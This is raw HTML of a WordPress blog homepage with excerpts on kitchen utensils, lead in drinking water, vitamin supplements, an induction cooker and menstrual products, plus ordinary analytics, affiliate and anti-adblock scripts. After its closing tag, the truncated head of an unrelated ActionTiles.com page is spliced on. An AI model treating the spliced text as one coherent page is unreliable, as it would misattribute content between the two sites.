menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9364"><a href="https://www.centurylife.org/category/body/" itemprop="url"><span itemprop="name">Body</span></a> <ul class="sub-menu"> <li id="menu-item-9366" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9366"><a href="https://www.centurylife.org/eat-poop-or-wash-your-hands/" itemprop="url"><span itemprop="name">Eat Poop or Wash Your Hands</span></a></li> <li id="menu-item-10646" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-10646"><a href="https://www.centurylife.org/in-depth-product-review-a-guide-to-feminine-hygiene-products-menstrual-pads-diva-cups-etc/" itemprop="url"><span itemprop="name">In-Depth Product Review: A Guide to Feminine Hygiene Products (Menstrual Pads, Diva cups, etc.)</span></a></li> </ul> </li> <li id="menu-item-9380" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9380"><a href="https://www.centurylife.org/category/news/science/" itemprop="url"><span itemprop="name">Science</span></a> <ul class="sub-menu"> <li id="menu-item-9382" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9382"><a href="https://www.centurylife.org/does-cooking-food-release-toxins-and-carcinogens/" itemprop="url"><span itemprop="name">Does cooking food create toxins and carcinogens?</span></a></li> <li id="menu-item-9372" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9372"><a href="https://www.centurylife.org/is-induction-more-efficient-than-electric-coil-or-gas-an-energy-efficiency-comparison-between-stoves/" itemprop="url"><span itemprop="name">Is Induction More Efficient Than Electric Coil or Gas?</span></a></li> <li id="menu-item-9371" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9371"><a href="https://www.centurylife.org/the-inefficiency-of-induction-converter-discs-aka-induction-interface-discs-and-what-your-real-alternatives-are/" itemprop="url"><span itemprop="name">Induction Interface Discs: Why They Don&#8217;t Work Well</span></a></li> <li id="menu-item-9381" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9381"><a href="https://www.centurylife.org/maillard-reactions/" itemprop="url"><span itemprop="name">Maillard Reactions (Why Food Tastes Good)</span></a></li> <li id="menu-item-9383" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9383"><a href="https://www.centurylife.org/whats-the-healthiest-cooking-oil/" itemprop="url"><span itemprop="name">What&#8217;s the healthiest cooking oil?</span></a></li> <li id="menu-item-9391" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9391"><a href="https://www.centurylife.org/understanding-imperfect-science/" itemprop="url"><span itemprop="name">Understanding Imperfect Science</span></a></li> </ul> </li> <li id="menu-item-9350" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9350"><a href="https://www.centurylife.org/category/food/" itemprop="url"><span itemprop="name">Food</span></a> <ul class="sub-menu"> <li id="menu-item-9344" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9344"><a href="https://www.centurylife.org/emergency-meals-fast-cooking-for-busy-people/" itemprop="url"><span itemprop="name">Emergency Meals – Fast, Easy Cooking for Busy People</span></a></li> <li id="menu-item-9343" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9343"><a href="https://www.centurylife.org/fake-vs-real-foods-a-savvy-buyers-guide-on-how-to-identify-genuine-food-products-and-forgeries/" itemprop="url"><span itemprop="name">Fake vs. Real Foods: A Savvy Buyer&#8217;s Guide on How to Identify Genuine Food Products and Forgeries</span></a></li> <li id="menu-item-9378" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9378"><a href="https://www.centurylife.org/garlic-anti-cancer-and-cardiovascular-health-benefits/" itemprop="url"><span itemprop="name">Garlic: anti-cancer and cardiovascular health benefits</span></a></li> <li id="menu-item-9345" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-9345"><a href="https://www.centurylife.org/nutrition/" itemprop="url"><span itemprop="name">Nutrition</span></a> <ul class="sub-menu"> <li id="menu-item-9368" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9368"><a href="https://www.centurylife.org/the-green-smoothie-is-the-most-important-meal-of-the-day/" itemprop="url"><span itemprop="name">The Green Smoothie is the Most Important Meal of the Day</span></a></li> <li id="menu-item-9401" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9401"><a href="https://www.centurylife.org/paleodietstartingpointnotendingpoint/" itemprop="url"><span itemprop="name">Paleo Diet: It&#8217;s A Starting But Not Ending Point</span></a></li> </ul> </li> <li id="menu-item-9352" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9352"><a href="https://www.centurylife.org/category/food/foodsafety/" itemprop="url"><span itemprop="name">Food Safety</span></a></li> <li id="menu-item-9367" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9367"><a href="https://www.centurylife.org/whats-the-healthiest-cooking-oil/" itemprop="url"><span itemprop="name">What&#8217;s the healthiest cooking oil?</span></a></li> </ul> </li> <li id="menu-item-9384" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9384"><a href="https://www.centurylife.org/category/books/" itemprop="url"><span itemprop="name">Books</span></a> <ul class="sub-menu"> <li id="menu-item-9424" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9424"><a href="https://www.centurylife.org/in-depth-product-review-amazon-kindle-fire-7-2015-tablet/" itemprop="url"><span itemprop="name">In-Depth Product Review: Amazon Kindle Fire 7 (2015) Tablet</span></a></li> <li id="menu-item-9386" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9386"><a href="https://www.centurylife.org/category/books/cookbooks/" itemprop="url"><span itemprop="name">Cookbooks</span></a> <ul class="sub-menu"> <li id="menu-item-9387" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9387"><a href="https://www.centurylife.org/in-depth-book-review-the-cancer-fighting-kitchen-nourishing-big-flavor-recipes-for-cancer-treatment-and-recovery-cookbook-by-rebecca-katz/" itemprop="url"><span itemprop="name">In-Depth Book Review: The Cancer-Fighting Kitchen</span></a></li> </ul> </li> </ul> </li> <li id="menu-item-9388" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9388"><a href="https://www.centurylife.org/category/baby/" itemprop="url"><span itemprop="name">Baby</span></a> <ul class="sub-menu"> <li id="menu-item-9389" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9389"><a href="https://www.centurylife.org/category/baby/food-and-drink/" itemprop="url"><span itemprop="name">Food and drink</span></a> <ul class="sub-menu"> <li id="menu-item-9390" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9390"><a href="https://www.centurylife.org/nutrition-avoiding-palm-olein-in-baby-formula/" itemprop="url"><span itemprop="name">Nutrition: Avoiding Palm Olein in Baby Formula</span></a></li> </ul> </li> <li id="menu-item-10113" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-10113"><a href="https://www.centurylife.org/safe-plastic-breast-milk-storage-bags-a-guide/" itemprop="url"><span itemprop="name">Safe Plastic Breast Milk Storage Bags: A Guide</span></a></li> </ul> </li> <li id="menu-item-9397" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9397"><a href="https://www.centurylife.org/category/cleaning/" itemprop="url"><span itemprop="name">Cleaning</span></a> <ul class="sub-menu"> <li id="menu-item-9398" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9398"><a href="https://www.centurylife.org/category/cleaning/kitchen-cleaning/" itemprop="url"><span itemprop="name">Kitchen</span></a> <ul class="sub-menu"> <li id="menu-item-9399" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-9399"><a href="https://www.centurylife.org/product-review-bar-keepers-friend-bkf/" itemprop="url"><span itemprop="name">In-Depth Product Review: Bar Keepers Friend (BKF)</span></a></li> </ul> </li> </ul> </li> <li id="menu-item-10116" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-10116"><a href="https://www.centurylife.org/category/traveloutdoors/" itemprop="url"><span itemprop="name">Travel/Outdoors</span></a> <ul class="sub-menu"> <li id="menu-item-10114" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-10114"><a href="https://www.centurylife.org/in-depth-product-review-iwatani-za-3hp-portable-butane-stove-burner/" itemprop="url"><span itemprop="name">In-Depth Product Review: Iwatani ZA-3HP Portable Butane Stove</span></a></li> <li id="menu-item-10128" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-10128"><a href="https://www.centurylife.org/taking-risk-out-of-driving-cars/" itemprop="url"><span itemprop="name">Taking risk out of driving cars</span></a></li> </ul> </li> <li id="menu-item-9411" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9411"><a href="https://www.centurylife.org/deals/" itemprop="url"><span itemprop="name">Deals</span></a></li> </ul></div></nav><header class="site-header" itemscope itemtype="https://schema.org/WPHeader"><div class="wrap"><div class="title-area"><h1 class="site-title" itemprop="headline"><a href="https://www.centurylife.org/">CenturyLife.Org</a></h1></div><div class="widget-area header-widget-area"><section id="search-2" class="widget widget_search"><div class="widget-wrap"><form class="search-form" itemprop="potentialAction" itemscope itemtype="https://schema.org/SearchAction" method="get" action="https://www.centurylife.org/" role="search"><input class="search-form-input" type="search" itemprop="query-input" name="s" id="searchform-5cdd8f2d084476.64573628" placeholder="Search this website"><input class="search-form-submit" type="submit" value="Search"><meta itemprop="target" content="https://www.centurylife.org/?s={s}"></form></div></section> </div></div></header><div class="site-inner"><div class="wrap"><div class="content-sidebar-wrap"><main class="content"><article class="post-11445 post type-post status-publish format-standard category-news entry" itemscope itemtype="https://schema.org/CreativeWork"><header class="entry-header"><h2 class="entry-title" itemprop="headline"><a class="entry-title-link" rel="bookmark" href="https://www.centurylife.org/great-article-on-the-humble-vegetable-peeler/">Great article on the humble vegetable peeler</a></h2> <p class="entry-meta"></p></header><div class="entry-content" itemprop="text"><p>FastCompany published <a href="https://www.fastcompany.com/90239156/the-untold-story-of-the-vegetable-peeler-that-changed-the-world" target="_blank" rel="noopener">a great story</a> entitled: &#8220;The untold story of the vegetable peeler that changed the world.&#8221;  Also known as <a href="https://amzn.to/2OZEVnG">the OXO Good Grips Swivel Peeler</a>.  As the article notes, it&#8217;s still got 4.8 stars out of 5 and costs under $10 all these years later!</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> </div><footer class="entry-footer"><p class="entry-meta"></p></footer></article><article class="post-10997 post type-post status-publish format-standard has-post-thumbnail category-food-prep category-productreviews entry" itemscope itemtype="https://schema.org/CreativeWork"><header class="entry-header"><h2 class="entry-title" itemprop="headline"><a class="entry-title-link" rel="bookmark" href="https://www.centurylife.org/in-depth-product-reviews-silicone-spatulas-turners-and-scrapers-comparison/">In-Depth Product Reviews: Silicone Spatulas, Turners, and Scrapers Comparison</a></h2> <p class="entry-meta"></p></header><div class="entry-content" itemprop="text"><p><!-- If you want to skip to the chase and see what silicone turners we found to be best, <a href="#results">click here for RESULTS. If you want recommendations for spatulas and tongs, <a href="#otherspattong">click here for OTHER UTENSILS: SPATULAS, TONGS, AND LADLES</a>. <span data-mce-type="bookmark" style="display: inline-block; width: 0px; overflow: hidden; line-height: 0;" class="mce_SELRES_start"></span>--></p> <p><strong>BACKGROUND</strong></p> <p>In a busy kitchen, nothing beats universal utensils for ease of use; you don&#8217;t want to think about whether a spatula is going to scratch nonstick cookware or not. Thus I&#8217;ve gone almost 100% silicone.  Plastic and (most) wood utensils won&#8217;t scratch up your nonstick pans, either, but they generally don&#8217;t tolerate heat and/or moisture as well as silicone.  In particular, nylon plastic utensils can soften and melt when exposed to temperatures above 400 degrees Fahrenheit (the exact temperature depends on the plastic).</p> <p>Furthermore, some manufacturers coat their entire utensils in silicone, instead of just the head of the utensil. A seamless silicone covering does a few things:</p> <ul> <li>No seams = no place for food/grime to build up</li> <li>Makes the handles impervious to heat as well. (Uncoated plastic handles can melt if you rest them onto the rim of hot pans.)</li> </ul> <p><strong>DEFINITIONS</strong></p> <div id='gallery-1' class='gallery galleryid-10997 gallery-columns-2 gallery-size-medium'><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='https://www.centurylife.org/wp-content/uploads/2017/02/IMG_1665.jpg'><img width="300" height="200" src="https://www.centurylife.org/wp-content/uploads/2017/02/IMG_1665-300x200.jpg" class="attachment-medium size-medium" alt="Turner (above) and Spatula (below); notice the bend in the turner&#039;s neck" aria-describedby="gallery-1-11094" srcset="https://www.centurylife.org/wp-content/uploads/2017/02/IMG_1665-300x200.jpg 300w, https://www.centurylife.org/wp-content/uploads/2017/02/IMG_1665-768x512.jpg 768w, https://www.centurylife.org/wp-content/uploads/2017/02/IMG_1665.jpg 900w" sizes="(max-width: 300px) 100vw, 300px" /></a> </div> <figcaption class='wp-caption-text gallery-caption' id='gallery-1-11094'> Turner (above) and Spatula (below); notice the bend in the turner&#8217;s neck </figcaption></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='https://www.centurylife.org/wp-content/uploads/2017/02/spatula-v-turner.gif'><img width="265" height="206" src="https://www.centurylife.org/wp-content/uploads/2017/02/spatula-v-turner.gif" class="attachment-medium size-medium" alt="Spatula vs Turner Difference" aria-describedby="gallery-1-11063" /></a> </div> <figcaption class='wp-caption-text gallery-caption' id='gallery-1-11063'> Spatula vs Turner Difference </figcaption></figure> </div> <p>Let&#8217;s get definitions out of the way.</p> <ul> <li><strong>Turners</strong> are for cooking.  The head of a turner will be angled, to allow you to reach the bottom of a saute or fry pan more easily to flip food.</li> <li><strong>Spatulas</strong> are mainly for baking and food prep.  They are relatively straight from end to end and allow you to scrape the sides of bowls/jars/cans/etc. effectively.</li> <li><strong>Scrapers</strong> are small spatulas you can use to scrape food from the insides of narrow jars.</li> </ul> <p><strong>WHAT MAKES FOR A GOOD SILICONE SPATULA/TURNER/SCRAPER?</strong></p> <p> <a href="https://www.centurylife.org/in-depth-product-reviews-silicone-spatulas-turners-and-scrapers-comparison/#more-10997" class="more-link">[Read more&#8230;]</a></p> </div><footer class="entry-footer"><p class="entry-meta"></p></footer></article><article class="post-10941 post type-post status-publish format-standard category-foodsafety category-news category-science entry" itemscope itemtype="https://schema.org/CreativeWork"><header class="entry-header"><h2 class="entry-title" itemprop="headline"><a class="entry-title-link" rel="bookmark" href="https://www.centurylife.org/thousands-of-u-s-locales-where-lead-poisoning-is-worse-than-in-flint-reuters/">Thousands of U.S. locales where lead poisoning is worse than in Flint (Reuters)</a></h2> <p class="entry-meta"></p></header><div class="entry-content" itemprop="text"><p>Flint is famous for failing to keep lead out of its drinking water, but in December 2016, Reuters found nearly 3,000 areas with recently recorded lead poisoning rates at least <em>double</em> those in Flint during the peak of that city’s contamination crisis. And more than 1,100 of these communities had a rate of elevated blood tests at least <em>four</em> times higher. <a href="http://www.reuters.com/investigates/special-report/usa-lead-testing/" target="_blank">http://www.reuters.com/investigates/special-report/usa-lead-testing/</a></p> <p>Reuters attributed this to the decay of American water-delivery infrastructure.  Yet many of these lead hotspots are receiving little attention or funding.</p> <p>No amount of lead is safe; tiny doses hurt your brain less, but they still hurt.  Whether you use bottled water, <a href="https://www.centurylife.org/in-depth-product-review-megahome-countertop-water-distiller-glass-collection-white-enamel-or-stainless-steel-finish/" target="_blank">Brita filters, water distillers</a>, or other means of purifying your water, make sure you keep your water pure somehow.</p> </div><footer class="entry-footer"><p class="entry-meta"></p></footer></article><article class="post-10910 post type-post status-publish format-standard category-news category-science entry" itemscope itemtype="https://schema.org/CreativeWork"><header class="entry-header"><h2 class="entry-title" itemprop="headline"><a class="entry-title-link" rel="bookmark" href="https://www.centurylife.org/why-vitamin-supplements-could-kill-you-bbc/">Why Vitamin Supplements Could Kill You (BBC)</a></h2> <p class="entry-meta"></p></header><div class="entry-content" itemprop="text"><p><a href="http://www.bbc.com/future/story/20161208-why-vitamin-supplements-could-kill-you" target="_blank">http://www.bbc.com/future/story/20161208-why-vitamin-supplements-could-kill-you</a></p> <p>Overloading your body with supplements like antioxidants could throw your natural systems out of balance&#8211;and even make you more susceptible to cancer.  Something to think about.</p> </div><footer class="entry-footer"><p class="entry-meta"></p></footer></article><article class="post-10712 post type-post status-publish format-standard has-post-thumbnail category-productreviews entry" itemscope itemtype="https://schema.org/CreativeWork"><header class="entry-header"><h2 class="entry-title" itemprop="headline"><a class="entry-title-link" rel="bookmark" href="https://www.centurylife.org/in-depth-product-review-secura-duxtop-9600ls-lcd-1800-watt-portable-induction-cooker-aka-countertop-burner/">In-Depth Product Review: Secura Duxtop 9600LS LCD 1800-Watt Portable Induction Cooker (aka Countertop Burner)</a></h2> <p class="entry-meta"></p></header><div class="entry-content" itemprop="text"><p><strong>PRODUCT REVIEW<br /> </strong></p> <p>This product review is for the <a href="https://www.amazon.com/Duxtop-1800-Watt-Induction-Countertop-9600LS/dp/B01FLR0ET8//ref=as_li_ss_tl?ie=UTF8&amp;linkCode=ll1&amp;tag=centuorg-20&amp;linkId=aa527fef54e2a9be2d80e68a9711db8f" target="_blank">Secura LCD Duxtop 9600LS 1800-Watt Portable Induction Cooker (Countertop Burner)</a>.</p> <p> <a href="https://www.centurylife.org/in-depth-product-review-secura-duxtop-9600ls-lcd-1800-watt-portable-induction-cooker-aka-countertop-burner/#more-10712" class="more-link">[Read more&#8230;]</a></p> </div><footer class="entry-footer"><p class="entry-meta"></p></footer></article><article class="post-10598 post type-post status-publish format-standard category-body category-productreviews category-sanitation-body entry" itemscope itemtype="https://schema.org/CreativeWork"><header class="entry-header"><h2 class="entry-title" itemprop="headline"><a class="entry-title-link" rel="bookmark" href="https://www.centurylife.org/in-depth-product-review-a-guide-to-feminine-hygiene-products-menstrual-pads-diva-cups-etc/">In-Depth Product Review: A Guide to Feminine Hygiene Products (Menstrual Pads, Diva cups, etc.)</a></h2> <p class="entry-meta"></p></header><div class="entry-content" itemprop="text"><p><strong>A History of Menstrual Products:</strong></p> <ul> <li>The first time historians saw menstrual hygiene products mentioned was around the 10th century A.D.  Women used rags as pads and lint wrapped around a small piece of wood or used materials like moss, animal skins, and grass as tampons.</li> <li>By the early 1700s, most women would use old rags as pads and would wash and reuse them.  A few other options were using sheepskin, boiling it clean with each use, or cheesecloth sacks stuffed with flattened cotton.</li> <li>In 1896 the first commercial sanitary pads, Lister’s Towels,  went on sale. They failed to sell because women hated the thought of declaring to the public that they were menstruating by buying pads.</li> <li>French nurses in World War I figured out that Curad <i>bandages </i>were much more absorbent than their homemade menstrual rags and started using them as pads. In 1920 Curads by Kotex, worn with a re-usable belt, hit the market.</li> <li>The first commercial applicator tampon with a cord for removal was invented in 1929 by Dr Earle Haas under the name Tampax, hitting the market in 1936.</li> <li>The 1930s saw the invention and production of the first reusable menstrual cup.  After becoming used to disposable products many women resisted a ‘backwards step’ in menstrual products.</li> <li>In the 1970s most companies started selling pads with adhesive backing, putting an end to the need for belts. Cloth pads made a comeback during this time as they saved money and were better for the environment.</li> <li>After the 1970s, the biggest change to sanitary pads and tampons was to become more discreet. Tampons got smaller, pads got thinner, and the packaging hid the products inside.</li> </ul> <p><strong>Current Options:</strong></p> <p> <a href="https://www.centurylife.org/in-depth-product-review-a-guide-to-feminine-hygiene-products-menstrual-pads-diva-cups-etc/#more-10598" class="more-link">[Read more&#8230;]</a></p> </div><footer class="entry-footer"><p class="entry-meta"></p></footer></article><div class="archive-pagination pagination"><ul><li class="active" ><a href="https://www.centurylife.org/" aria-label="Current page" aria-current="page">1</a></li> <li><a href="https://www.centurylife.org/page/2/">2</a></li> <li><a href="https://www.centurylife.org/page/3/">3</a></li> <li class="pagination-omission">&#x02026;</li> <li><a href="https://www.centurylife.org/page/24/">24</a></li> <li class="pagination-next"><a href="https://www.centurylife.org/page/2/" >Next Page &#x000BB;</a></li> </ul></div> </main><aside class="sidebar sidebar-primary widget-area" role="complementary" aria-label="Primary Sidebar" itemscope itemtype="https://schema.org/WPSideBar"><section id="simple-social-icons-2" class="widget simple-social-icons"><div class="widget-wrap"><h4 class="widget-title widgettitle">Social Media Updates</h4> <ul class="aligncenter"><li class="ssi-facebook"><a href="https://www.facebook.com/pages/Centurylifeorg/181947941991774" ><svg role="img" class="social-facebook" aria-labelledby="social-facebook-2"><title id="social-facebook-2">Facebook</title><use xlink:href="https://www.centurylife.org/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-facebook"></use></svg></a></li><li class="ssi-gplus"><a href="http://plus.google.com/106735079728894808964/" ><svg role="img" class="social-gplus" aria-labelledby="social-gplus-2"><title id="social-gplus-2">Google+</title><use xlink:href="https://www.centurylife.org/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-gplus"></use></svg></a></li><li class="ssi-pinterest"><a href="https://www.pinterest.com/centurylifeorg/" ><svg role="img" class="social-pinterest" aria-labelledby="social-pinterest-2"><title id="social-pinterest-2">Pinterest</title><use xlink:href="https://www.centurylife.org/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-pinterest"></use></svg></a></li><li class="ssi-twitter"><a href="https://twitter.com/centurylife_org" ><svg role="img" class="social-twitter" aria-labelledby="social-twitter-2"><title id="social-twitter-2">Twitter</title><use xlink:href="https://www.centurylife.org/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-twitter"></use></svg></a></li></ul></div></section> <section id="text-20" class="widget widget_text"><div class="widget-wrap"><h4 class="widget-title widgettitle">Popular Posts</h4> <div class="textwidget"><font size="+1">• <a href="https://www.centurylife.org/how-to-choose-cookware/">How to Choose Cookware</a><br> <br> • <a href="https://www.centurylife.org/how-to-choose-a-cooktop/how-to-choose-a-portable-induction-cooker-countertop-burner/">How to choose a portable induction cooker</a><br> <br> • <a href="https://www.centurylife.org/how-to-choose-an-enameled-dutch-oven-is-le-creuset-worth-it-is-staub-worth-it-why-does-it-cost-so-much-what-are-my-alternatives-are-chinese-made-ovens-safe-can-i-use-bare-cast-iron-instead-how/">How to choose an enameled dutch oven</a><br> <br> • <a href="https://www.centurylife.org/is-all-clad-worth-it-is-it-still-made-in-america-why-does-it-cost-so-much-what-are-some-alternatives/">How to choose clad/tri-ply stainless (Is All-Clad Worth it?)</a><br> <br> • Even heating rankings: <a href="https://www.centurylife.org/cookware-even-heating-rankings-butane-propane-natural-gas-etc/">gas</a> and <a href="https://www.centurylife.org/cookware-even-heating-rankings-induction-and-electric/">electric</a><br> <br> <!-- Begin MailChimp Signup Form --> <link href="//cdn-images.mailchimp.com/embedcode/slim-10_7.css" rel="stylesheet" type="text/css"> <style type="text/css"> #mc_embed_signup{background:#fff; clear:left; font:14px Helvetica,Arial,sans-serif; } /* Add your own MailChimp form style overrides in your site stylesheet or in this style block. We recommend moving this block and the preceding CSS link to the HEAD of your HTML file. */ </style> <div id="mc_embed_signup"> <form action="//centurylife.us9.list-manage.com/subscribe/post?u=b5b5009ec1fe0e642b769b4db&amp;id=6a08dc2f7d" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate> <div id="mc_embed_signup_scroll"> <label for="mce-EMAIL">Monthly Email Updates</label> <input type="email" value="" name="EMAIL" class="email" id="mce-EMAIL" placeholder="email address" required> <!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups--> <div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_b5b5009ec1fe0e642b769b4db_6a08dc2f7d" tabindex="-1" value=""></div> <div class="clear"><input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="button"></div> </div> </form> </div> <!--End mc_embed_signup--> <font size="-1">Copyright © 2013-2019 CenturyLife.Org &middot; All Rights Reserved. <a href="https://www.centurylife.org/about/about-the-site-administrator/">Disclaimers</a></font></div> </div></section> </aside></div></div></div><footer class="site-footer" itemscope itemtype="https://schema.org/WPFooter"><div class="wrap"></div></footer></div><div id="NjNiccFWEYIz" class="QAiMaFcrBOkW" style="background:#ffffff;z-index:9999999; "></div> <script type="text/javascript">/* <![CDATA[ */var anOptions ={"anOptionChoice":"2","anOptionStats":"2","anOptionAdsSelectors":"","anOptionCookie":"1","anOptionCookieLife":"30","anPageRedirect":"","anPermalink":"undefined","anOptionModalEffect":"none","anOptionModalspeed":"0","anOptionModalclose":true,"anOptionModalOverlay":"rgba( 0,0,0,0.5 )","anAlternativeActivation":false,"anAlternativeElement":"","anAlternativeText":"<p>Some ad-blockers mistakenly block some of the product images in our reviews.\u00a0 Please disable\u00a0 your ad-blocker for this site so you can see all of the photos.<strong><br \/>\n<\/strong><\/p>\n","anAlternativeClone":"4","anAlternativeProperties":"","anOptionModalShowAfter":0,"anPageMD5":"","anSiteID":0,"modalHTML":"<div class=\"QAiMaFcrBOkW-default\">\n\t<h1 style=\"\"><\/h1>\n\t<p>We grab internet data to show\u00a0current\u00a0product prices, but your adblocker is blocking this data. You can fix it\u00a0by\u00a0exempting this site from your adblocker.<\/p>\n<\/div>\n<a class=\"close-modal close-QAiMaFcrBOkW\">&#215;<\/a>"}/* ]]> */</script><div id="adsense" class="an-sponsored" style="position:absolute; z-index:-1; height:1px; width:1px; visibility: hidden; top: -1px; left: 0;"><img class="an-advert-banner" alt="sponsored" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div><div class="scroll-back-to-top-wrapper"> <span class="scroll-back-to-top-inner"> <i class="fa fa-2x fa-arrow-up"></i> </span> </div><script src="//z-na.amazon-adsystem.com/widgets/onejs?MarketPlace=US&adInstanceId=34668c2b-ffdd-4369-8e51-d02d56e20cb8"></script> <script type="text/javascript"> var vglnk = { key: '4ee8ed96d7666ce03d1db2b390c56032' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script')); </script> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-44523657-1', 'auto'); ga('send', 'pageview'); </script><style type="text/css" media="screen"> #simple-social-icons-2 ul li a, #simple-social-icons-2 ul li a:hover, #simple-social-icons-2 ul li a:focus { background-color: #999999 !important; border-radius: 2px; color: #ffffff !important; border: 0px #ffffff solid !important; font-size: 18px; padding: 9px; } #simple-social-icons-2 ul li a:hover, #simple-social-icons-2 ul li a:focus { background-color: #666666 !important; border-color: #ffffff !important; color: #ffffff !important; } #simple-social-icons-2 ul li a:focus { outline: 1px dotted #666666 !important; }</style><script type='text/javascript'> /* <![CDATA[ */ var scrollBackToTop = {"scrollDuration":"0","fadeDuration":"0.5"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.centurylife.org/wp-content/plugins/scroll-back-to-top/assets/js/scroll-back-to-top.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var q2w3_sidebar_options = [{"sidebar":"sidebar","margin_top":10,"margin_bottom":0,"stop_id":"","screen_max_width":480,"screen_max_height":0,"width_inherit":false,"refresh_interval":1500,"window_load_hook":false,"disable_mo_api":false,"widgets":["text-20"]}]; /* ]]> */ </script> <script type='text/javascript' src='https://www.centurylife.org/wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js?ver=5.1.7'></script> <script type='text/javascript'> /* <![CDATA[ */ var ajax_object = {"nonce":"62548f94e2","ajaxurl":"https:\/\/www.centurylife.org\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.centurylife.org/wp-content/uploads/UFUAsqAKKUIp/nudgporUYALJ.js?ver=2.2.3'></script> <script type='text/javascript' src='https://www.centurylife.org/wp-includes/js/wp-embed.min.js?ver=5.2'></script> </body></html>
0
<!DOCTYPE HTML> <html class="" lang="en-US" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://ogp.me/ns/fb#"> <head><link rel="stylesheet" type="text/css" href="https://www.actiontiles.com/wp-content/cache/minify/8e581.css?x17256" media="all" /> <meta charset="UTF-8"> <title>ActionTiles.com</title> <script>window._wca = window._wca || [];</script> <script type='text/javascript'>console.log('PixelYourSite Free version 7.0.2');</script> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//cdn.jsdelivr.net' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="ActionTiles.com &raquo; Feed" href="https://www.actiontiles.com/feed" /> <link rel="alternate" type="application/rss+xml" title="ActionTiles.com &raquo; Comments Feed" href="https://www.actiontiles.com/comments/feed" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE"> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.actiontiles.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=f04dc3177fb921b81ffc7558dd18000d"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px 